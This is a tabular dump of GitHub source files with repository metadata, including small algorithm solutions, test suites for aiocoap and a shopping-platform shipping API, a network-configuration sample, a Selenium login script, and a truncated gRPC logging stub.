blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
14a3acc0bab16e60abbf783682b7aa042165a154
|
20bb1ae805cd796a7c377e55966633441d1d9fd5
|
/uva/10680 LCM/lcm.py
|
b168af4bd0eee42ae91ee9c4dc81041695a8fe27
|
[] |
no_license
|
nathantheinventor/solved-problems
|
1791c9588aefe2ebdc9293eb3d58317346d88e83
|
c738e203fa77ae931b0ec613e5a00f9a8f7ff845
|
refs/heads/master
| 2022-10-27T08:58:23.860159 | 2022-10-13T20:18:43 | 2022-10-13T20:18:43 | 122,110,149 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 559 |
py
|
ans = [0, 1]
cur = 1
factors = [[] for _ in range(1000001)]
for i in range(2, 1000001, 2):
factors[i].append(2)
for i in range(3, 1000001, 2):
if len(factors[i]) == 0:
for k in range(i, 1000001, i):
factors[k].append(i)
for i in range(2, 1000001):
if len(factors[i]) == 1:
for factor in factors[i]:
cur *= factor
while cur % 10 == 0:
cur //= 10
cur %= 1000
ans.append(cur)
n = int(input())
while n > 0:
# print(n)
print(ans[n] % 10)
n = int(input())
|
[
"[email protected]"
] | |
4cd078afb5311f126095acf7b92ad0506caea81c
|
87796f8b79b325cdfca7a98b120d690a13ebd267
|
/capture/noworkflow/tests/prov_definition/__init__.py
|
b9e742c0dad1702ab87430c5fbb2e8279693e496
|
[
"MIT"
] |
permissive
|
raffaelfoidl/noworkflow
|
c53c6be45960a93aa546fd8f6c967af2b7c31c93
|
aa4ca189df24fec6c7abd32bcca6a097b21fdf31
|
refs/heads/master
| 2021-01-06T16:32:57.036864 | 2020-03-23T14:12:37 | 2020-03-23T14:12:37 | 241,398,493 | 0 | 0 |
MIT
| 2020-02-18T15:36:16 | 2020-02-18T15:36:15 | null |
UTF-8
|
Python
| false | false | 426 |
py
|
# Copyright (c) 2016 Universidade Federal Fluminense (UFF)
# Copyright (c) 2016 Polytechnic Institute of New York University.
# This file is part of noWorkflow.
# Please, consult the license terms in the LICENSE file.
from __future__ import (absolute_import, print_function,
division, unicode_literals)
from .slicing_test import TestSlicingDependencies
__all__ = [
b"TestSlicingDependencies",
]
|
[
"[email protected]"
] | |
8614ee5eeee6d74b19ddc1e1113d47b06dddb8bd
|
4e5141121d8b4015db233cbc71946ec3cfbe5fe6
|
/samples/basic/crud/gnmi/models/cisco-ios-xr/Cisco-IOS-XR-ethernet-lldp-cfg/gn-create-xr-ethernet-lldp-cfg-20-ydk.py
|
3d8398de12dc3fa89df78ddc852a3fa57177f1dc
|
[
"Apache-2.0"
] |
permissive
|
itbj/ydk-py-samples
|
898c6c9bad9d6f8072892300d42633d82ec38368
|
c5834091da0ebedbb11af7bbf780f268aad7040b
|
refs/heads/master
| 2022-11-20T17:44:58.844428 | 2020-07-25T06:18:02 | 2020-07-25T06:18:02 | 282,382,442 | 1 | 0 | null | 2020-07-25T06:04:51 | 2020-07-25T06:04:50 | null |
UTF-8
|
Python
| false | false | 2,824 |
py
|
#!/usr/bin/env python
#
# Copyright 2016 Cisco Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Create configuration for model Cisco-IOS-XR-ethernet-lldp-cfg.
usage: gn-create-xr-ethernet-lldp-cfg-20-ydk.py [-h] [-v] device
positional arguments:
device gNMI device (http://user:password@host:port)
optional arguments:
-h, --help show this help message and exit
-v, --verbose print debugging messages
"""
from argparse import ArgumentParser
from urlparse import urlparse
from ydk.path import Repository
from ydk.services import CRUDService
from ydk.gnmi.providers import gNMIServiceProvider
from ydk.models.cisco_ios_xr import Cisco_IOS_XR_ethernet_lldp_cfg \
as xr_ethernet_lldp_cfg
import os
import logging
YDK_REPO_DIR = os.path.expanduser("~/.ydk/")
def config_lldp(lldp):
"""Add config data to lldp object."""
lldp.enable = True
if __name__ == "__main__":
"""Execute main program."""
parser = ArgumentParser()
parser.add_argument("-v", "--verbose", help="print debugging messages",
action="store_true")
parser.add_argument("device",
help="gNMI device (http://user:password@host:port)")
args = parser.parse_args()
device = urlparse(args.device)
# log debug messages if verbose argument specified
if args.verbose:
logger = logging.getLogger("ydk")
logger.setLevel(logging.INFO)
handler = logging.StreamHandler()
formatter = logging.Formatter(("%(asctime)s - %(name)s - "
"%(levelname)s - %(message)s"))
handler.setFormatter(formatter)
logger.addHandler(handler)
# create gNMI provider
repository = Repository(YDK_REPO_DIR+device.hostname)
provider = gNMIServiceProvider(repo=repository,
address=device.hostname,
port=device.port,
username=device.username,
password=device.password)
# create CRUD service
crud = CRUDService()
lldp = xr_ethernet_lldp_cfg.Lldp() # create object
config_lldp(lldp) # add object configuration
# create configuration on gNMI device
crud.create(provider, lldp)
exit()
# End of script
|
[
"[email protected]"
] | |
174b23a0701205e2da87894ca11e6fddd5a246d5
|
38a263d52c52a8834b175e867330d8415dad7384
|
/Regression_suite_bigc/api/test_shipping_method_api.py
|
39dd52af582926da309c4c1bc141b4d413de60a9
|
[] |
no_license
|
testing-sravan/tests-scripts-worked
|
4e57c47c4ea9a9bc22e85a8b6d628615907537bd
|
33c579918356f6ff1cdfd5635d6eba1d85eba0b7
|
refs/heads/master
| 2021-01-10T20:39:12.805680 | 2014-09-15T04:54:02 | 2014-09-15T04:54:02 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,893 |
py
|
from lib.api_lib import *
from lib.shipping_class import *
AUSPOST_AUTH_KEY = "bzfac4efaf7e7e51a4b1dbd7cc76cb31"
@pytest.mark.skipif("True")
def ttest_disable_shipping_reboot(browser, url, email, password):
shipping = ShippingClass(browser)
shipping.go_to_admin(browser, url, email, password)
shipping.set_feature_flag(browser, 'disable', 'ShippingReboot')
def test_create_australian_post_in_control_panel(browser, url, email, password):
shipping = ShippingClass(browser)
shipping.go_to_admin(browser, url, email, password)
shipping.navigate_to_shipping()
shipping.skip_shipping_intro()
if not shipping.is_new_ui(browser):
shipping.setup_store_location_new(shipping.au_store_location)
shipping.add_country_zone(shipping.us_country_zone)
shipping.open_country_zone("United States")
shipping.setup_australia_post()
return
pytest.skip("Not new UI")
shipping.setup_store_location(browser, "Australia","New South Wales","2000")
browser.find_element_by_id('tab1').click()
browser.execute_script("$('#div1 .dropdown-trigger:first').click()")
WebDriverWait(browser, 30).until(lambda s: s.find_element_by_link_text('Edit Methods').is_displayed() and s.find_element_by_link_text('Edit Methods'))
browser.find_element_by_link_text('Edit Methods').click()
shipping.disable_the_shipping_method(browser)
WebDriverWait(browser, 30).until(lambda s: s.find_element_by_xpath('//input[@value="Add a Shipping Method..."]').is_displayed() and s.find_element_by_xpath('//input[@value="Add a Shipping Method..."]'))
browser.find_element_by_xpath('//input[@value="Add a Shipping Method..."]').click()
browser.find_element_by_xpath('//span[text()="Australia Post"]').click()
element= shipping.wait_until_element_present('shipping_australiapost_auth_key', "ID")
element.send_keys(AUSPOST_AUTH_KEY)
element = shipping.wait_until_element_present('Select All', 'LINK')
element.click()
browser.find_element_by_name('SubmitButton1').click()
shipping.verify_and_assert_success_message(browser, "The shipping method has been created successfully.", ".alert-success")
#JSON Payload
def test_get_shipping_methods(auth_token, url, username, state):
api = urlparse.urljoin(url, 'api/v2/shipping/methods')
result = basic_auth_get(api, username, auth_token)
newdata = json.loads(result.text)
state['shipping_method_id'] = newdata[0]['id']
assert newdata[0]['id'] > 0
for item in newdata:
try:
assert newdata[item].find('name').text == "Australia Post"
assert newdata[item].find('method_name').text == "shipping_australiapost"
return
except:
pass
return False
def test_get_shipping_methods_by_id(auth_token, url, username, state):
api = urlparse.urljoin(url, 'api/v2/shipping/methods/' + str(state['shipping_method_id']) + '')
result = basic_auth_get(api, username, auth_token)
newdata = json.loads(result.text)
assert newdata[0]['id'] > 0
for item in newdata:
try:
assert newdata[item].find('name').text == "Australia Post"
assert newdata[item].find('method_name').text == "shipping_australiapost"
return
except:
pass
return False
# XML Payload
def test_get_shipping_methods_xml_payload(auth_token, url, username, state):
api = urlparse.urljoin(url, 'api/v2/shipping/methods')
result = basic_auth_get(api, username, auth_token, payload_format = 'xml')
newdata = etree.fromstring(result.text)
state['shipping_method_id_xml'] = newdata[0].find('id').text
assert newdata[0].find('id').text > 0
for item in newdata:
try:
assert newdata[item].find('name').text == "Australia Post"
assert newdata[item].find('method_name').text == "shipping_australiapost"
return
except:
pass
return False
def test_get_shipping_methods_by_id_xml_payload(auth_token, url, username, state):
api = urlparse.urljoin(url, 'api/v2/shipping/methods/' + str(state['shipping_method_id_xml']) + '')
result = basic_auth_get(api, username, auth_token, payload_format = 'xml')
newdata = etree.fromstring(result.text)
assert newdata[0].find('id').text > 0
for item in newdata:
try:
assert newdata[item].find('name').text == "Australia Post"
assert newdata[item].find('method_name').text == "shipping_australiapost"
return
except:
pass
return False
@pytest.mark.skipif("True")
def ttest_delete_australian_post_in_control_panel(browser, url, email, password):
shipping = ShippingClass(browser)
shipping.go_to_admin(browser, url, email, password)
browser.find_element_by_link_text("Setup & Tools").click()
browser.find_element_by_link_text('Shipping').click()
browser.find_element_by_id('tab1').click()
browser.execute_script("$('#div1 .dropdown-trigger:first').click()")
WebDriverWait(browser, 30).until(lambda s: s.find_element_by_link_text('Edit Methods').is_displayed() and s.find_element_by_link_text('Edit Methods'))
browser.find_element_by_link_text('Edit Methods').click()
browser.execute_script("$('.GridRow').find('td:contains(Australia Post)').parent('tr').children('td:eq(0)').find('input').attr('checked','checked')")
browser.find_element_by_xpath('//input[@value="Delete Selected"]').click()
try:
alert = browser.switch_to_alert()
alert.accept()
except WebDriverException:
browser.execute_script("window.confirm = function(){return true;}");
browser.find_element_by_xpath('//input[@value="Delete Selected"]').click()
shipping.verify_and_assert_success_message(browser, "The selected shipping methods have been deleted successfully.", ".alert-success")
|
[
"jenkins@localhost"
] |
jenkins@localhost
|
ae79db95820afa78fc580aa49376922c0c238952
|
ad13583673551857615498b9605d9dcab63bb2c3
|
/output/models/ms_data/datatypes/facets/float_pkg/float_min_inclusive005_xsd/__init__.py
|
2aa44ebe2b8660a5c90d5e944cdea45e6804713b
|
[
"MIT"
] |
permissive
|
tefra/xsdata-w3c-tests
|
397180205a735b06170aa188f1f39451d2089815
|
081d0908382a0e0b29c8ee9caca6f1c0e36dd6db
|
refs/heads/main
| 2023-08-03T04:25:37.841917 | 2023-07-29T17:10:13 | 2023-07-30T12:11:13 | 239,622,251 | 2 | 0 |
MIT
| 2023-07-25T14:19:04 | 2020-02-10T21:59:47 |
Python
|
UTF-8
|
Python
| false | false | 180 |
py
|
from output.models.ms_data.datatypes.facets.float_pkg.float_min_inclusive005_xsd.float_min_inclusive005 import (
FooType,
Test,
)
__all__ = [
"FooType",
"Test",
]
|
[
"[email protected]"
] | |
19278d8ef7d38d9fef53807d8b5f43c6599c1860
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_310/ch24_2019_02_28_22_51_17_076072.py
|
a696f9213b91ef86ad0fdb8ed69e705024d7c53c
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 204 |
py
|
def classifica_triangulo(l1, l2, l3):
if l1==l2 and l1==l3:
return "equilátero"
elif l1==l2 and l1!=l3 or l1!=l2 and l1==l3:
return "isóceles"
else:
return "escaleno"
|
[
"[email protected]"
] | |
12b57b06ca8399fdc27fa38e011de43de67a8a30
|
94f4bb0f6e43b2eb2f1bdb284a580b76121fa9af
|
/559.py
|
36b10d1ab3ede26c95a47dba50b8ef0aa9c74592
|
[] |
no_license
|
huosan0123/leetcode-py
|
f1ec8226bae732369d4e1989b99ab0ba4b4061c4
|
22794e5e80f534c41ff81eb40072acaa1346a75c
|
refs/heads/master
| 2021-01-25T11:48:17.365118 | 2019-09-12T15:45:34 | 2019-09-12T15:45:34 | 93,934,297 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 547 |
py
|
"""
# Definition for a Node.
class Node(object):
def __init__(self, val, children):
self.val = val
self.children = children
"""
class Solution(object):
def maxDepth(self, root):
"""
:type root: Node
:rtype: int
"""
if not root:
return 0
depths = [self.maxDepth(ch) for ch in root.children]
# children 使用list表示的,可能为空;
if not depths:
depth = 0
else:
depth = max(depths)
return 1 + depth
|
[
"[email protected]"
] | |
abc71170bebc5eeabbc454115b8a9dcc7b9a858e
|
7db0883137d119565540f2d071638c4016f39213
|
/Note/Spider/2.28-selenium/selenium+phantomjs学习/selenium_study3.py
|
452662361c9123151650e6ef605f1db84e6b3d4e
|
[] |
no_license
|
PhilHuang-d/python---
|
cf22a4cc00d4beaaf75ef7ca87a4c5d31a9d5efe
|
152c18f51838ce652b79a0cd24765b1a1c237eee
|
refs/heads/master
| 2021-09-13T05:32:53.754865 | 2018-04-25T13:36:40 | 2018-04-25T13:36:40 | 108,812,447 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,975 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import random
__author__ = 'Terry'
USER_AGENTS = [
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:16.0) Gecko/20121026 Firefox/16.0'
]
phantomjs_driver_path = 'D:/phantomjs/bin/phantomjs.exe'
from selenium import webdriver
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
import time
# 引入配置对象DesiredCapabilities
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
def save_vcode(driver, element):
# 获取截图
driver.get_screenshot_as_file('screenshot.png')
left = int(element.location['x'])
top = int(element.location['y'])
right = int(element.location['x'] + element.size['width'])
bottom = int(element.location['y'] + element.size['height'])
# 通过Image处理图像
from PIL import Image
im = Image.open('screenshot.png')
im = im.crop((left, top, right, bottom))
im.save('vcode.png')
dcap = dict(DesiredCapabilities.PHANTOMJS)
#从USER_AGENTS列表中随机选一个浏览器头,伪装浏览器
# dcap["phantomjs.page.settings.userAgent"] = (random.choice(USER_AGENTS))
dcap["phantomjs.page.settings.userAgent"] = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:16.0) Gecko/20121026 Firefox/16.0'
# 不载入图片,爬页面速度会快很多
# dcap["phantomjs.page.settings.loadImages"] = False
#打开带配置信息的phantomJS浏览器
driver = webdriver.PhantomJS(phantomjs_driver_path, desired_capabilities=dcap)
# 设置10秒页面超时返回,类似于requests.get()的timeout选项,driver.get()没有timeout选项
# 以前遇到过driver.get(url)一直不返回,但也不报错的问题,这时程序会卡住,设置超时选项能解决这个问题。
driver.set_page_load_timeout(10)
# 设置10秒脚本超时时间
driver.set_script_timeout(10)
# 设置屏幕尺寸
driver.set_window_size(1366, 768)
# 访问百度
driver.get('https://www.baidu.com')
WebDriverWait(driver, 30, 1).until(EC.presence_of_element_located((By.XPATH, '//*[@id="u1"]/a[7]')))
print(driver.title)
time.sleep(1)
# 点击 弹出登录的窗口
login_index = driver.find_element_by_xpath('//*[@id="u1"]/a[7]')
login_index.click()
time.sleep(.5)
# 选择 用户名登录
login_user_and_pwd = driver.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__footerULoginBtn"]')
login_user_and_pwd.click()
time.sleep(.5)
# 用户名元素
user = driver.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__userName"]')
user.clear()
user.send_keys('用户名')
# 密码元素
pwd = driver.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__password"]')
pwd.clear()
pwd.send_keys('密码')
while True:
# 换下一张 验证码
next_vcode = driver.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__verifyCodeChange"]')
next_vcode.click()
# 验证码图片的元素
vcode_img = driver.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__verifyCodeImg"]')
save_vcode(driver, vcode_img)
# 输入验证码
vcode_input = input('请输入验证码:')
vcode = driver.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__verifyCode"]')
# 在页面上填写验证码
vcode.send_keys(vcode_input)
# 登录
login = driver.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__submit"]')
login.click()
time.sleep(1)
try:
# 判断是否登录成功
user_name = driver.find_element_by_xpath('//*[@id="s_username_top"]/span')
print("登录名为:"+user_name.text)
print("登录成功:")
break
except:
time.sleep(.3)
driver.get('http://index.baidu.com/?tpl=trend&word=%BB%C6%BD%F0')
# 需要手动退出driver
driver.quit()
|
[
"[email protected]"
] | |
bfc54acf5cfe74cdca27af81c9e898c7ad2005c3
|
37a67a9531f8c32739ae70fc5be55b4c6acae60d
|
/multinomial.py
|
61b5f29f47a1620d45a703bb42a374da45ab4e3d
|
[
"MIT"
] |
permissive
|
gongkecun/distribution-is-all-you-need
|
da1b1b363df3343e0753e55564311e323cd6c890
|
93ae5ed7fa63607474d61723d2d28d1a4b3c653a
|
refs/heads/master
| 2020-08-27T10:03:21.144561 | 2019-10-24T15:04:43 | 2019-10-24T15:04:43 | 217,326,807 | 0 | 0 |
MIT
| 2019-10-24T15:02:48 | 2019-10-24T15:02:48 | null |
UTF-8
|
Python
| false | false | 1,217 |
py
|
"""
Code by Tae-Hwan Hung(@graykode)
https://en.wikipedia.org/wiki/Multinomial_distribution
3-Class Example
"""
import numpy as np
from matplotlib import pyplot as plt
import operator as op
from functools import reduce
def factorial(n):
return reduce(op.mul, range(1, n + 1), 1)
def const(n, a, b, c):
"""
return n! / a! b! c!, where a+b+c == n
"""
assert a + b + c == n
numer = factorial(n)
denom = factorial(a) * factorial(b) * factorial(c)
return numer / denom
def multinomial(n):
"""
:param x : list, sum(x) should be `n`
:param n : number of trial
:param p: list, sum(p) should be `1`
"""
# get all a,b,c where a+b+c == n, a<b<c
ls = []
for i in range(1, n + 1):
for j in range(i, n + 1):
for k in range(j, n + 1):
if i + j + k == n:
ls.append([i, j, k])
y = [const(n, l[0], l[1], l[2]) for l in ls]
x = np.arange(len(y))
return x, y, np.mean(y), np.std(y)
for n_experiment in [20, 21, 22]:
x, y, u, s = multinomial(n_experiment)
plt.scatter(x, y, label=r'$trial=%d$' % (n_experiment))
plt.legend()
plt.savefig('graph/multinomial.png')
plt.show()
|
[
"[email protected]"
] | |
245925707f4f6c6c98786d629ccf351760017361
|
80ae9b5cfb45b6e9cf7873ef7c46e17e117e4019
|
/data/HackerRank-Python/Matrix Script.py
|
114fa5ab8380753bbc2fe298d07e8f760aeb97f0
|
[] |
no_license
|
Ritvik19/CodeBook
|
ef7764d89b790e902ede5802f36d5ca910d8a50e
|
2b4ed7938bbf156553d6ba5cba6216449528f0fc
|
refs/heads/master
| 2021-07-04T08:25:52.478719 | 2020-08-08T06:54:14 | 2020-08-08T06:54:14 | 138,744,302 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 326 |
py
|
#!/bin/python3
import math
import os
import random
import re
import sys
n, m = map(int, input().rstrip().split())
matrix = []
for _ in range(n):
matrix_item = input()
matrix.append(matrix_item)
print(re.sub(r'(?<=[A-Za-z0-9])([^A-Za-z0-9]+)(?=[A-Za-z0-9])',' ',"".join("".join(decode) for decode in zip(*matrix))))
|
[
"[email protected]"
] | |
e4076d56d19e0b60f79ef0b63139cbc98873367c
|
e92d752737f3e90a47355d5502a364a9e2d0c08b
|
/tests/test_reverseproxy.py
|
c93c3521ab514877f5527c50f379fbd88223bb84
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
miri64/aiocoap
|
c7815758371f0a83c51b058fb0c24e8024feae9f
|
93e699280b644465213fc8ba29bae556475fb6fc
|
refs/heads/master
| 2023-08-15T16:46:27.985718 | 2021-10-05T17:15:00 | 2021-10-05T17:15:00 | 404,324,558 | 0 | 0 |
NOASSERTION
| 2021-09-08T11:39:12 | 2021-09-08T11:39:12 | null |
UTF-8
|
Python
| false | false | 4,526 |
py
|
# This file is part of the Python aiocoap library project.
#
# Copyright (c) 2012-2014 Maciej Wasilak <http://sixpinetrees.blogspot.com/>,
# 2013-2014 Christian Amsüss <[email protected]>
#
# aiocoap is free software, this file is published under the MIT license as
# described in the accompanying LICENSE file.
import asyncio
import unittest
from . import common
from .test_server import WithAsyncLoop, Destructing, WithClient, WithTestServer, CLEANUPTIME
import aiocoap.proxy.client
import aiocoap.cli.proxy
from aiocoap.util import hostportjoin
class WithReverseProxy(WithAsyncLoop, Destructing):
def setUp(self):
super(WithReverseProxy, self).setUp()
self.reverseproxy = aiocoap.cli.proxy.Main(
["--reverse", "--bind", hostportjoin(self.proxyhost, self.proxyport), "--namebased", "%s:%s"%(self.name_for_real_server, self.servernetloc), "--pathbased", "%s:%s"%("/".join(self.path_for_real_server), self.servernetloc)],
loop=self.loop,
)
self.loop.run_until_complete(self.reverseproxy.initializing)
def tearDown(self):
super(WithReverseProxy, self).tearDown()
self.loop.run_until_complete(self.reverseproxy.shutdown())
# creating a reference loop between the cli instance and its contexts,
# so that the cli instance's gc-ing is linked o the contexts'.
# TODO how can we handle this more smoothly?
self.reverseproxy.outgoing_context._cli = self.reverseproxy
self.reverseproxy.proxy_context._cli = self.reverseproxy
self._del_to_be_sure('reverseproxy')
self.loop.run_until_complete(asyncio.sleep(CLEANUPTIME))
proxyport = 56839
proxyhost = common.loopbackname_v6 or common.loopbackname_v46
proxyaddress = '%s:%d'%(proxyhost, proxyport)
name_for_real_server = 'aliasedname'
path_for_real_server = ('aliased', 'name')
class TestReverseProxy(WithReverseProxy, WithClient, WithTestServer):
@unittest.skipIf(common.using_simple6, "Some proxy tests fail with simple6 (https://github.com/chrysn/aiocoap/issues/88)")
def test_routing(self):
yieldfrom = lambda f: self.loop.run_until_complete(f)
def req():
request = aiocoap.Message(code=aiocoap.GET)
request.unresolved_remote = self.proxyaddress
request.opt.uri_path = ('big',)
return request
request = req()
response = yieldfrom(self.client.request(request).response)
self.assertEqual(response.code, aiocoap.BAD_REQUEST, "GET without hostname gave resource (something like BAD_REQUEST expected)")
request = req()
request.opt.uri_host = self.name_for_real_server
response = yieldfrom(self.client.request(request).response)
self.assertEqual(response.code, aiocoap.CONTENT, "GET with hostname based proxying was not successful)")
request = req()
request.opt.uri_path = self.path_for_real_server + request.opt.uri_path
response = yieldfrom(self.client.request(request).response)
self.assertEqual(response.code, aiocoap.CONTENT, "GET with path based proxying was not successful)")
@unittest.skipIf(common.using_simple6, "Some proxy tests fail with simple6 (https://github.com/chrysn/aiocoap/issues/88)")
def test_options(self):
yieldfrom = lambda f: self.loop.run_until_complete(f)
def req():
request = aiocoap.Message(code=aiocoap.GET)
request.unresolved_remote = self.proxyaddress
request.opt.uri_path = ('big',)
request.opt.uri_host = self.name_for_real_server
return request
request = req()
request.opt.proxy_scheme = 'coap'
response = yieldfrom(self.client.request(request).response)
self.assertEqual(response.code, aiocoap.BAD_OPTION, "Reverse proxy supports proxying even though it shouldn't.")
request = req()
request.opt.add_option(aiocoap.optiontypes.StringOption(2**10 + 2, "can't proxy this"))
response = yieldfrom(self.client.request(request).response)
self.assertEqual(response.code, aiocoap.BAD_OPTION, "Proxy did not react to unsafe option.")
request = req()
request.opt.add_option(aiocoap.optiontypes.StringOption(2**10, "nothing to see here"))
response = yieldfrom(self.client.request(request).response)
self.assertEqual(response.code, aiocoap.CONTENT, "Proxy did not ignore to safe-to-forward option.")
|
[
"[email protected]"
] | |
449248113ab98dd46f92d9e76576d832177aefbd
|
f9acfbff2744c014cd4adbc53d75316cacc00896
|
/pycspr/api/get_node_peers.py
|
caff8d058e48be88cc650078538c0c1ab16f9b24
|
[
"Apache-2.0"
] |
permissive
|
Shr1ftyy/casper-python-sdk
|
30fb3edc42551faef0b9bf10bf5a13ed8b5ac9f5
|
1c32ef89ef269f0307d530cfd635cfcbb3f29290
|
refs/heads/main
| 2023-07-27T17:17:40.054075 | 2021-07-29T09:58:12 | 2021-07-29T09:58:12 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 490 |
py
|
import jsonrpcclient as rpc_client
from pycspr.client import NodeConnectionInfo
# Method upon client to be invoked.
_API_ENDPOINT = "info_get_peers"
def execute(connection_info: NodeConnectionInfo) -> dict:
"""Returns node peers information.
:param connection_info: Information required to connect to a node.
:returns: Node peers information.
"""
response = rpc_client.request(connection_info.address_rpc, _API_ENDPOINT)
return response.data.result["peers"]
|
[
"[email protected]"
] | |
70f0c42a9f45b0c0587d68145739c19c27479312
|
6efea391d0dd6087d8753057cff45867884fe5f1
|
/google/cloud/logging_v2/proto/logging_pb2_grpc.py
|
e1759bbc1b990fe9d20bf576c1c5f12009895806
|
[
"Apache-2.0"
] |
permissive
|
tswast/python-logging
|
d9c4ae1ee87fb29436e2f16d9adac2a7a2d08378
|
c4387b307f8f3502fb53ae1f7e1144f6284280a4
|
refs/heads/master
| 2022-12-30T19:50:14.840163 | 2020-08-12T20:28:40 | 2020-08-12T20:28:40 | 298,009,362 | 0 | 0 |
Apache-2.0
| 2020-09-23T15:12:47 | 2020-09-23T15:12:46 | null |
UTF-8
|
Python
| false | false | 6,922 |
py
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from google.cloud.logging_v2.proto import (
logging_pb2 as google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2,
)
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
class LoggingServiceV2Stub(object):
"""Service for ingesting and querying logs.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.DeleteLog = channel.unary_unary(
"/google.logging.v2.LoggingServiceV2/DeleteLog",
request_serializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.DeleteLogRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.WriteLogEntries = channel.unary_unary(
"/google.logging.v2.LoggingServiceV2/WriteLogEntries",
request_serializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.WriteLogEntriesRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.WriteLogEntriesResponse.FromString,
)
self.ListLogEntries = channel.unary_unary(
"/google.logging.v2.LoggingServiceV2/ListLogEntries",
request_serializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListLogEntriesRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListLogEntriesResponse.FromString,
)
self.ListMonitoredResourceDescriptors = channel.unary_unary(
"/google.logging.v2.LoggingServiceV2/ListMonitoredResourceDescriptors",
request_serializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListMonitoredResourceDescriptorsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListMonitoredResourceDescriptorsResponse.FromString,
)
self.ListLogs = channel.unary_unary(
"/google.logging.v2.LoggingServiceV2/ListLogs",
request_serializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListLogsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListLogsResponse.FromString,
)
class LoggingServiceV2Servicer(object):
"""Service for ingesting and querying logs.
"""
def DeleteLog(self, request, context):
"""Deletes all the log entries in a log. The log reappears if it receives new
entries. Log entries written shortly before the delete operation might not
be deleted. Entries received after the delete operation with a timestamp
before the operation will be deleted.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def WriteLogEntries(self, request, context):
"""Writes log entries to Logging. This API method is the
only way to send log entries to Logging. This method
is used, directly or indirectly, by the Logging agent
(fluentd) and all logging libraries configured to use Logging.
A single request may contain log entries for a maximum of 1000
different resources (projects, organizations, billing accounts or
folders)
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
